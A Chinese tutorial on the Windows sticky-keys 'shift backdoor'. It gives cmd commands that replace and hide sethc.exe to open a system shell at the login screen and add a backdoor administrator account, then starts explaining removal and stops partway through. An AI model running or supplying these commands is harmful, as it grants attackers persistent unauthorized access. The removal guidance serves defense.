一、什么是shift后门?

shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。

其操作就是在不知道管理员密码的情况下，连续按5次shift键来启动粘滞键，已进入服务器的系统程序管理器。

二、shift后门的制作？

其制作有很多种，下面介绍一种常用的，可以明白其原理自己扩展：

在cmd窗口，敲打命令如下：

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

用copy命令将explorer.exe复制为setch.exe，这样在登陆界面下连续按5次shift就可以调出程序管理系统了，就获取了系统权限。

(也可以将explorer.exe 改为cmd.exe，这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了，就获取了shell权限。)

使用命令：

net user admin 123456 /add && net localgroup administrators admin /add

执行上面的命令，便可以创建一个叫admin的用户，密码为123456.

三、shift后门的禁止？

两种方法：

第一种：直接删除C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择”显示所有文件和文件夹”把”隐藏受系统保护的操作系统文件”的选择取消才能看得到).这种方法不能完全解除，当服务器重启后，还是会出现后门。

第二种（建议使用这种方法）：使用权限来约束这两个文件C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache这两个目录的sethc.exe文件,(注意:dllcache这个目录是隐藏的,要在文件夹选项里选择”显示所有文件和文件夹”把”隐藏受系统保护的操作系统文件”的选择取消才能看得到). 在权限里设置为所有用户(Everyone)禁止运行。具体操作步骤如下：

1.找到C:\WINDOWS\system32目录下的sethc.exe文件，打开属性：

启用shift后门的方法_shift按五次怎么取消